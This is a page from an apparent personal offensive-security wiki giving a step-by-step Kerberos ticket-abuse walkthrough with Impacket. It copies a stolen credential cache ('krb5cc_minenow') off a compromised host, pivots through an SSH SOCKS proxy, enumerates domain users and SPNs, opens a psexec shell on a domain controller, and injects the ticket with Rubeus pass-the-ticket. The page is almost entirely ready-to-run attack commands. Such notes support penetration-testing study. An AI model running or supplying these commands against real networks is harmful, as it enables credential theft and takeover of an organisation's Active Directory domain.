AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page

Was this helpful?

  1. Offensive Cyberz
  2. Linux

Impacket

Kerberos with Impacket

in order to perform ticket manipulation we need to install the kerberos linux client utilities on the kali box

apt install krb5-user

  • If you screw up the install or need to change something

    • sudo dpkg-reconfigure krb5-config

    • all values to target domain

We’ll also have to copy the ccache file previously obtained to our local Kali box

scp kali@targetbox:/tmp/krb5cc_minenow /tmp/krb5cc_minenow

Next we’ll have to update the environment variable on our local kali box

export KRB5CCNAME=/tmp/krb5cc_minenow

We’ll need to update the hosts file to map the hostnames to IP addresses

sudo echo '192.168.2.2 dc01.domain.com' >> /etc/hosts
sudo echo '192.168.2.2 domain.com' >> /etc/hosts

Also the source IP address will have to be correct so proxychains will need to be used

proxychains4.conf will need to comment out DNS

sed -i 's/proxy_dns/\#proxy_dns/g' dns.txt

set up a socks server on the pivot host

ssh kali@targetbox -D 9050

now proxychains & impacket can be used to interact with the remote host

proxychains python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all -k -no-pass -dc-ip 192.168.X.Y DOMAIN.COM/Administrator

Gather a list of SPNs available

proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -k -no-pass -dc-ip 192.168.X.Y DOMAIN.COM/Administrator

get a shell on the remote box

proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py Administrator@DC01.DOMAIN.COM -k -no-pass

Renew

proxychains kinit -R

Convert ccache to kirbi

./ticket_converter.py admin.ccache admin.kirbi

inject ticket on compromised windows box

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
PreviousShellsNextSSH

Last updated 3 years ago

Was this helpful?